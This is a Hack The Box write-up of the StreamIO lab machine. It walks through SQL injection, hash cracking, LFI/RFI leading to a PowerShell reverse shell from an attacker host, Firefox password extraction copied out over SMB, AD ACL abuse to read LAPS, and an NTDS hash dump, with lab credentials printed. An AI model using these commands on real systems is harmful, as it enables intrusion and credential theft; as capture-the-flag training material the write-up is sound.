HTB - StreamIO

Machine Info

StreamIO is a medium machine that covers subdomain enumeration leading to an SQL injection in order to retrieve stored user credentials, which are cracked to gain access to an administration panel. The administration panel is vulnerable to LFI, which allows us to retrieve the source code for the administration pages and leads to identifying a remote file inclusion vulnerability, the abuse of which gains us access to the system. After the initial shell we leverage the SQLCMD command line utility to enumerate databases and obtain further credentials used in lateral movement. As the secondary user we found Firefox profile contains database which can extract saved credentials from it. Using the new credentials within BloodHound we discover that the user has the ability to add themselves to a specific group in which they can read LDAP secrets. Without direct access to the account, we use PowerShell to abuse this feature and add ourselves to the `Core Staff` group, then access LDAP to disclose the administrator LAPS password.

Enumeration

Scope

IP Address: 10.10.11.158

Nmap Scan

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ nmap -p- --min-rate 10000 $ip -Pn 

PORT     STATE SERVICE          REASON
53/tcp   open  domain           syn-ack
80/tcp   open  http             syn-ack
88/tcp   open  kerberos-sec     syn-ack
135/tcp  open  msrpc            syn-ack
139/tcp  open  netbios-ssn      syn-ack
389/tcp  open  ldap             syn-ack
443/tcp  open  https            syn-ack
445/tcp  open  microsoft-ds     syn-ack
464/tcp  open  kpasswd5         syn-ack
593/tcp  open  http-rpc-epmap   syn-ack
3268/tcp open  globalcatLDAP    syn-ack
3269/tcp open  globalcatLDAPssl syn-ack
5985/tcp open  wsman            syn-ack

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ sudo nmap -sU $ip --min-rate 10000 --open -v -oN udp-scan -p1-10000

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ nmap -p53,80,88,135,139,389,443,445,464,593,3268,3269,5985 -sCV $ip -Pn -oN Nmap/script-scan

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-07-09 09:09:22Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
443/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
| ssl-cert: Subject: commonName=streamIO/countryName=EU
| Subject Alternative Name: DNS:streamIO.htb, DNS:watch.streamIO.htb
| Not valid before: 2022-02-22T07:03:28
|_Not valid after:  2022-03-24T07:03:28
|_ssl-date: 2024-07-09T09:10:11+00:00; +7h00m03s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn: 
|_  http/1.1
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-07-09T09:09:33
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 7h00m02s, deviation: 0s, median: 7h00m02s

* Open ports: 53,80,88,135,139,389,443,445,464,593,3268,3269,5985
* UDP Open ports: 53,88,123,389
* Services: DNS - HTTP - HTTPS - RPC - SMB - KERBEROS - LDAP - winRM
* Versions: IIS httpd 10.0
* Important Notes: Domain: streamIO.htb - DNS:watch.streamIO.htb

Before I start enumeration process, I will update /etc/hosts with the info from Nmap script output

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ sudo sh -c "echo  '$ip streamIO.htb watch.streamIO.htb' >> /etc/hosts"

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ tail -n1 /etc/hosts
10.10.11.158 streamIO.htb watch.streamIO.htb

DNS Enumeration

I tried zone transfer but failed

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ dig axfr streamIO.htb @$ip

; <<>> DiG 9.19.19-1-Debian <<>> axfr streamIO.htb @10.10.11.158
;; global options: +cmd
; Transfer failed.

RPC & SMB Enumeration

I got access denied when enumerating the two services

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ rpcclient -U "%" $ip
Cannot connect to server.  Error was NT_STATUS_ACCESS_DENIED

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ smbclient -N -L //$ip                                                 
session setup failed: NT_STATUS_ACCESS_DENIED

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ crackmapexec smb $ip -u ''  -p '' --shares

SMB     10.10.11.158    445    DC    [-] streamIO.htb\: STATUS_ACCESS_DENIED

KERBEROS Enumeration

Then, I attempted to enumerate username looking for possible path but also nothing found

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ kerbrute userenum --dc $ip -d StreamIO.htb -t 100 -o users.list /usr/share/wordlists/seclists/Usernames/jsmith.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

2024/07/08 22:27:10 >  Done! Tested 48705 usernames (0 valid) in 57.952 seconds

HTTP & HTTPS enumeration

http://10.10.11.158

https://10.10.11.158

I tried fuzzing subdomains, but nothing found, however when I tried subdomain fuzzing against https protocol, I got a hit

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -u http://$ip/ -H "Host: FUZZ.StreamIO.htb" -fs 703 -t 200

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

<snip>
:: Progress: [19966/19966] :: Job [1/1] :: 444 req/sec :: Duration: [0:01:00] :: Errors: 0 ::

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -u https://$ip/ -H "Host: FUZZ.StreamIO.htb" -fs 703 -t 200 -k

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

<snip>
watch     [Status: 200, Size: 2829, Words: 202, Lines: 79, Duration: 1478ms]

https://watch.streamIO.htb

I looked at Wappalyzer to see what technology being used and PHP took my attention as it's not common to run php on IIS, So I attempted directory fuzzing against https://watch.streamIO.htb

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/Common-PHP-Filenames.txt:FUZZ -u https://watch.streamIO.htb/FUZZ -k -t 200

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

index.php     [Status: 200, Size: 2829, Words: 202, Lines: 79, Duration: 2171ms]
search.php    [Status: 200, Size: 253887, Words: 1, Lines: 1, Duration: 3382ms]
Index.php     [Status: 200, Size: 2829, Words: 202, Lines: 79, Duration: 867ms]

Also, attempt php files fuzzing on https://steamIO.htb

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/Common-PHP-Filenames.txt:FUZZ -u https://streamIO.htb/FUZZ -t 200 -k

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev

index.php    [Status: 200, Size: 13497, Words: 5027, Lines: 395, Duration: 366ms]
login.php    [Status: 200, Size: 4145, Words: 796, Lines: 111, Duration: 479ms]
logout.php   [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 470ms]
about.php    [Status: 200, Size: 7825, Words: 2228, Lines: 231, Duration: 786ms]
register.php [Status: 200, Size: 4500, Words: 905, Lines: 121, Duration: 841ms]
contact.php  [Status: 200, Size: 6434, Words: 2010, Lines: 206, Duration: 1200ms]

https://streamIO.htb/login.php

I don't have any credentials, So I will return if obtained one.

https://watch.streamIO.htb/search.php

It's a search function that searches of film name in specific table which can be considered as database, and we can attempt sql injection.

When I delivered a simple payload, I get blocked by some security defences in place

blocked.php

So, I can't use SQLMap and I will continue manually.

Something interesting took my attention here. when I type a word like man it matched it from both side.

It returns Batman, Anger Management so it uses wildcard such as *Search*.

The SQL Command maybe like this

SELECT * From movies where Film_name = '*input*'

I can break the code with something like that input';--

SELECT * From movies where Film_name = '*input';-- *'

I was right and when I typed man';-- It matches only wildcard from right side as we already escape the left side

Let's Create our exploit, I tried union 1,2,... until I got a hit at union 1,2,3,4,5,6

SELECT * From movies where Film_name = '*anything' union select 1,2,3,4,5,6 -- *'

Field 2 is got triggered So I will inject command on it

So, we're dealing with MSSQL database, we can use command from this cheat sheet:

Get the use name:

Current Database:

We're on MSSQL database, So one common attack vector is that we can get the hash on current use by executing the following command. I did it but failed as I got the machine account hash and couldn't be cracked

anthing' EXEC master..xp_dirtree '\\10.10.16.3\share\';--

Continue to explore the database

We're already in STREAMIO, Let's explore the tables

When I provided an asterisk * it didn't return anything but when I provide username it returned list of usernames

when I provide password, it returned list of hashes, but I can't copy and paste them one by one, it's a waste of time

I looked at burp to see the HTML tag that the hashes is included in

So, I will use curl command to get a list of hashes and filter the results

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ curl -k -XPOST https://watch.streamIO.htb/search.php -d "q=anything' union select 1,password,3,4,5,6 FROM users;--" | grep '<h5 class="p-2">' | awk '{print $2}' | cut -d\> -f2 | tee -a hashes.txt

<snip>
0049ac57646627b8d7aeaccf8b6a936f
08344b85b329d7efd611b7a7743e8a09
083ffae904143c4796e464dac33c1f7d
0cfaaaafb559f081df2befbe66686de0
<snip>

I will do the same thing with usernames

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ curl -k -XPOST https://watch.streamIO.htb/search.php -d "q=anything' union select 1,username,3,4,5,6 FROM users;--" | grep '<h5 class="p-2">' | awk '{print $2}' | cut -d\> -f2 | tee -a users.txt

<snip>
Theodore
Victor
Victoria
William
yoshihide

Initial Access

The username list is big for brute forcing so I will try to know who is really has account on the machine by enumerating Kerberos

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ kerbrute userenum --dc $ip -d streamIO.htb -t 100 -o users.list ./users.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

2024/07/09 00:35:59 >  [+] VALID USERNAME:       yoshihide@streamIO.htb

I got a user's list and hashes list, Let's attempt to crack the hashed and then try brute forcing.

First, Start hashcat in auto-detection mode the know the type of hash

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ hashcat  hashes.txt /usr/share/wordlists/rockyou.txt                                                                                                                        ======+============================================================+===================                                                                             
    900 | MD4                                                        | Raw Hash
      0 | MD5                                                        | Raw Hash
     70 | md5(utf16le($pass))                                        | Raw Hash
   2600 | md5(md5($pass))                                            | Raw Hash salted and/or iterated
   3500 | md5(md5(md5($pass)))                                       | Raw Hash salted and/or iterated
   4400 | md5(sha1($pass))                                           | Raw Hash salted and/or iterated
  20900 | md5(sha1($pass).md5($pass).sha1($pass))                    | Raw Hash salted and/or iterated
   4300 | md5(strtoupper(md5($pass)))                                | Raw Hash salted and/or iterated
   1000 | NTLM                                                       | Operating System
   9900 | Radmin2                                                    | Operating System
   8600 | Lotus Notes/Domino 5                                       | Enterprise Application Software (EAS)

Not all the hash cracked but we will be fine with what we found

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ hashcat  -m 0 hashes.txt /usr/share/wordlists/rockyou.txt

<snip>
Session..........: hashcat
Status...........: Exhausted

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ hashcat  -m 0 hashes.txt /usr/share/wordlists/rockyou.txt --show
08344b85b329d7efd611b7a7743e8a09:##123a8j8w5123##
2a4e2cf22dd8fcb45adcb91be1e22ae8:$monique$1991$
3577c47eb1e12c8ba021611e1280753c:highschoolmusical
54c88b2dbd7b1a84012fabc1a4c73415:$hadoW
665a50ac9eaa781e4f7f04199db97a11:paddpadd
6dcd87740abb64edfa36d170f0d5450d:$3xybitch
b22abb47a02b52d5dfa27fb0b534f693:!5psycho8!
b779ba15cedfd22a023c4d8bcf5f2332:66boysandgirls..
b83439b16f844bd6ffe35c02fe21b3c0:!?Love?!123
ee0b8a0937abd60c2882eacb2f8dc49f:physics69i
ef8f3d30a856cf166fb8215aca93e9ff:%$clara
f87d3c0d6c8fd686aacc6627f1f493a5:!!sabrina$

Creating passwords list for brute forcing

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ hashcat  -m 0 hashes.txt /usr/share/wordlists/rockyou.txt --show | cut -d: -f2 | tee -a pass.lst

<snip>
highschoolmusical
$hadoW
paddpadd
<snip>

Unfortunately, I didn't get a hit when I tried brute forcing

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ crackmapexec smb $ip -u yoshihide -p pass.lst

SMB         10.10.11.158    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.158    445    DC               [-] streamIO.htb\yoshihide:##123a8j8w5123## STATUS_LOGON_FAILURE
SMB         10.10.11.158    445    DC               [-] streamIO.htb\yoshihide:$monique$1991$ STATUS_LOGON_FAILURE
SMB         10.10.11.158    445    DC               [-] streamIO.htb\yoshihide:highschoolmusical STATUS_LOGON_FAILURE
SMB         10.10.11.158    445    DC               [-] streamIO.htb\yoshihide:$hadoW STATUS_LOGON_FAILURE
SMB         10.10.11.158    445    DC               [-] streamIO.htb\yoshihide:paddpadd STATUS_LOGON_FAILURE
SMB         10.10.11.158    445    DC               [-] streamIO.htb\yoshihide:$3xybitch STATUS_LOGON_FAILURE
SMB         10.10.11.158    445    DC               [-] streamIO.htb\yoshihide:!5psycho8! STATUS_LOGON_FAILURE
SMB         10.10.11.158    445    DC               [-] streamIO.htb\yoshihide:66boysandgirls.. STATUS_LOGON_FAILURE
SMB         10.10.11.158    445    DC               [-] streamIO.htb\yoshihide:!?Love?!123 STATUS_LOGON_FAILURE
SMB         10.10.11.158    445    DC               [-] streamIO.htb\yoshihide:physics69i STATUS_LOGON_FAILURE
SMB         10.10.11.158    445    DC               [-] streamIO.htb\yoshihide:%$clara STATUS_LOGON_FAILURE
SMB         10.10.11.158    445    DC               [-] streamIO.htb\yoshihide:!!sabrina$ STATUS_LOGON_FAILURE

I remember the login.php page that I left behind as I didn't have any credentials.

Intercept the request and send it to intruder and then start the attack with passwords we have

Fuzzing for '/admin' directory and parameters

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt:FUZZ -u https://streamIO.htb/FUZZ -t 200 -k                                                                
        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/                                                                                                                           

images     [Status: 301, Size: 151, Words: 9, Lines: 2, Duration: 694ms]
admin      [Status: 301, Size: 150, Words: 9, Lines: 2, Duration: 1498ms] 

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/Common-PHP-Filenames.txt:FUZZ -u https://streamIO.htb/admin/FUZZ -t 200 -k

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       


index.php      [Status: 403, Size: 18, Words: 1, Lines: 1, Duration: 901ms]
master.php     [Status: 200, Size: 58, Words: 5, Lines: 2, Duration: 617ms]

https://streamio.htb/admin/master.php

There is a missing parameter or something, Let's try parameter fuzzing

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u https://streamIO.htb/admin/?FUZZ= -t 200 -k -fs 1678 -H "Cookie: PHPSESSID=nnt2pl59ell9hqjdvu82ugegpf"

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

debug      [Status: 200, Size: 1712, Words: 90, Lines: 50, Duration: 987ms]
movie      [Status: 200, Size: 320235, Words: 15986, Lines: 10791, Duration: 596ms]
user       [Status: 200, Size: 2073, Words: 146, Lines: 63, Duration: 1524ms]
staff      [Status: 200, Size: 12484, Words: 1784, Lines: 399, Duration: 8876ms]

https://streamio.htb/admin/?debug=

I tried LFI in this parameter and I got a hit https://streamio.htb/admin/?debug=C:\Windows\System32\drivers\etc\hosts

I will use this vulnerability to read the content of master.php using php wrapper

Shell as yoshihide

echo "onlyPGgxPk1vdmllIG1hbmFnbW......." | base64 -d | tee -a master.php

The file is check it has to be included


cat master.php

<?php
if(!defined('included'))
        die("Only accessable through includes"); 

<snip>

Looking at the end of code, It takes the input in parameter include in POST request.

<?php
if(isset($_POST['include']))
{
if($_POST['include'] !== "index.php" ) 
eval(file_get_contents($_POST['include']));
else
echo(" ---- ERROR ---- ");
}
?>

I will include master.php from https://streamio.htb/admin/?debug= and append inlcude parameter to the POST request to meet the conditions.

We have found LFI before but RFI didn't work on Debug= parameter, So I will try RFI on include parameter

we got a hit, Let's create a webshell for us.

system("PowerShell -c powershell -e <base64>");

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ curl -XPOST https://streamio.htb/admin/?debug=master.php -d "include=http://10.10.16.3/shell.php" -H "Cookie: PHPSESSID=nujp4k6q68sd43p4jc439fuepo" -k

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ rlwrap nc -lvnp 443 
listening on [any] 443 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.11.158] 59891

PS C:\inetpub\streamio.htb\admin>

I looked around, found login.php and decided to explore its content

PS C:\inetpub\streamio.htb> dir

    Directory: C:\inetpub\streamio.htb

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        2/22/2022   2:49 AM                admin
d-----        2/22/2022   2:49 AM                css
d-----        2/22/2022   2:49 AM                fonts
d-----        2/22/2022   2:49 AM                images
d-----        2/22/2022   3:19 AM                js
-a----        2/23/2022   2:16 AM           4341 about.php
-a----        2/23/2022   2:16 AM           1357 about_include.php
-a----        2/23/2022   2:16 AM           2908 contact.php
-a----        2/23/2022   2:16 AM           1706 contact_include.php
-a----        7/30/2021   1:57 AM           1150 favicon.ico
-a----        2/22/2022   3:21 AM           1812 header_include.php
-a----        2/25/2022  11:57 PM           7337 index.php
-a----        2/23/2022   2:16 AM           2415 info_include.php
-a----        2/26/2022   8:27 AM           3938 login.php
-a----        2/23/2022   2:16 AM            216 logout.php
-a----        2/25/2022  11:42 PM           4480 register.php                                                          

PS C:\inetpub\streamio.htb> type login.php

<snip>

<?php                                                                                                                                                      
$connection = array("Database"=>"STREAMIO" , "UID" => "db_user", "PWD" => 'B1@hB1@hB1@h');                                                                 
$handle = sqlsrv_connect('(local)',$connection);                                                                                                           
function bad_char_check($name

I searched for other passwords that maybe exists and find one

PS C:\inetpub\streamio.htb> ls -Force | select-string -pattern "PWD"

login.php:46:$connection = array("Database"=>"STREAMIO" , "UID" => "db_user", "PWD" => 'B1@hB1@hB1@h');
register.php:81:    $connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890');

It's a password for mssql database

db_user:'B1@hB1@hB1@h'
db_admin:'B1@hx31234567890'

Shell as nikk37

Let's examine the db with SQLCMD tool

PS C:\inetpub\streamio.htb> sqlcmd.exe -S localhost -U db_user -P 'B1@hB1@hB1@h' -Q "select @@version"

----------------------------------------------------------------------------------------
Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64) 
        Sep 24 2019 13:48:23 
        Copyright (C) 2019 Microsoft Corporation
        Express Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)

(1 rows affected)

PS C:\inetpub\streamio.htb> sqlcmd.exe -S localhost -U db_admin -P 'B1@hx31234567890' -Q "use streamio_backup"
Changed database context to 'streamio_backup'.

PS C:\inetpub\streamio.htb> sqlcmd.exe -S localhost -U db_admin -P 'B1@hx31234567890' -Q "SELECT table_name FROM streamio_backup.INFORMATION_SCHEMA.TABLES"
table_name                                                                                                                      
----------------------------------------------------------------------------------------
movies
users

PS C:\inetpub\streamio.htb> sqlcmd.exe -S localhost -U db_admin -P 'B1@hx31234567890' -d 'streamio_backup' -Q "select * from users"
id          username                                           password                                          
----------- -------------------------------------------------- -------------------------
          1 nikk37                                             389d14cb8e4e9b94b137deb1caf0612a                  
          2 yoshihide                                          b779ba15cedfd22a023c4d8bcf5f2332                  
          3 James                                              c660060492d9edcaa8332d89c99c9239                  
          4 Theodore                                           925e5408ecb67aea449373d668b7359e                  
          5 Samantha                                           083ffae904143c4796e464dac33c1f7d                  
          6 Lauren                                             08344b85b329d7efd611b7a7743e8a09                  
          7 William                                            d62be0dc82071bccc1322d64ec5b6c51                  
          8 Sabrina                                            f87d3c0d6c8fd686aacc6627f1f493a5

shorten our users list by ensuring that the username already exists

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ kerbrute userenum --dc $ip -d StreamIO.htb -t 100 -o users.list ./backup_users                                    
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

2024/07/09 03:41:07 >  [+] VALID USERNAME:       yoshihide@StreamIO.htb
2024/07/09 03:41:07 >  [+] VALID USERNAME:       nikk37@StreamIO.htb

Only one hash was cracked, So it must be for one of the two users

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ hashcat -m 0 backup_hashes /usr/share/wordlists/rockyou.txt

389d14cb8e4e9b94b137deb1caf0612a:get_dem_girls2xxxxxxxxxxxx

Confirm

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ crackmapexec smb $ip -u 'nikk37'  -p 'get_dem_girls2xxxxxxxxx' 

SMB    10.10.11.158    445    DC    [+] streamIO.htb\nikk37:get_dem_girls2xxxxxxxxx

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ evil-winrm -i $ip -u nikk37 -p 'get_dem_girls2xxxxxxxxxx'

*Evil-WinRM* PS C:\Users\nikk37\Documents> type ..\Desktop\user.txt
a00c4e521d2bed26c166xxxxxxxxxxxxx

User Flag: a00c4e521d2bed26c166xxxxxxxxxxxxx

Privilege Escalation

I found that the system has Mozilla Firefox installed, So I looked at the user Mozilla profile and I copied it to my kali machine to try decrypt the Firefox secrets and cookies

Start SMB Server

──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ smbserver
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

*Evil-WinRM* PS C:\Users\nikk37> net use z: \\10.10.16.3\share /user:blind0bandit blind0bandit
The command completed successfully. 

*Evil-WinRM* PS C:\Users\nikk37> copy -r AppData\Roaming\Mozilla\FireFox\Profiles\br53rxeg.default-release\ z:

I change directory the folder I copied from windows box and start firepwd.py to decrypt Firefox secrets.

┌──(kali㉿kali)-[~/…/HTB/machines/StreamIO/br53rxeg.default-release]
└─$ python3 /opt/firepwd/firepwd.py

<snip>
decrypting login/password pairs
https://slack.streamio.htb:b'admin',b'JDg0dd1s@d0p3cr3@t0r'
https://slack.streamio.htb:b'nikk37',b'n1kk1sd0p3t00:)'
https://slack.streamio.htb:b'yoshihide',b'paddpadd@12'
https://slack.streamio.htb:b'JDgodd',b'password@12'

I found some credentials let's try them on brute forcing account

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ crackmapexec smb $ip -u fire_users -p admin_passwords 

<snip>
SMB    10.10.11.158    445    DC    [+] streamIO.htb\JDgodd:JDg0dd1s@d0p3cr3@t0r

I fired up bloodhound to see what the user JDgodd can do and file the following:
- JDgodd Can writeOwner on CORE STAFF group which enable use to add ourselves in that group
- CORE STAFF group has the rights to read LAPS password on the DC machine

Let's list the command we will use for that purpose:

$SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('STREAMIO.HTB\JDGodd', $SecPassword)
Add-DomainObjectAcl -Credential $cred -TargetIdentity "Core Staff" -PrincipalIdentity "streamio\JDgodd"
Add-DomainGroupMember -Credential $cred -Identity "Core Staff" -Members "StreamIO\JDgodd"

I personally use crackmapexec to pull the laps

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ crackmapexec smb $ip -u 'JDGodd'  -p 'JDg0dd1s@d0p3cr3@t0r' --laps 

SMB  10.10.11.158  445  DC   [-] DC\administrator:G58E)u0@)96rU1 STATUS_LOGON_FAILURE

Alternative way from the community using ldapsearch

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ ldapsearch -H ldap://10.10.11.158 -b 'DC=streamIO,DC=htb' -x -D JDgodd@streamio.htb -w 'JDg0dd1s@d0p3cr3@t0r' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd

<snip>
dn: CN=DC,OU=Domain Controllers,DC=streamIO,DC=htb
ms-Mcs-AdmPwd: G58E)u0@)96rU1

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ impacket-psexec streamip.htb/administrator@$ip
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:

<snip>
C:\Windows\system32> type C:\Users\Martin\Desktop\root.txt              
fcca05f1388d18d964521ce53582793

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ crackmapexec smb $ip -u administrator -p 'G58E)u0@)96rU1' --ntds    
SMB         10.10.11.158    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.158    445    DC               [+] streamIO.htb\administrator:G58E)u0@)96rU1 (Pwn3d!)
SMB         10.10.11.158    445    DC               [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         10.10.11.158    445    DC               Administrator:500:aad3b435b51404eeaad3b435b51404ee:63ab0c9344ca0c42ce367de76cafec16:::
SMB         10.10.11.158    445    DC               Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.11.158    445    DC               krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5f5142aae3cce656285ce4504605dec1:::
SMB         10.10.11.158    445    DC               JDgodd:1104:aad3b435b51404eeaad3b435b51404ee:8846130392c4169cb552fe5b73b046af:::
SMB         10.10.11.158    445    DC               Martin:1105:aad3b435b51404eeaad3b435b51404ee:a9347432fb0034dd1814ca794793d377:::
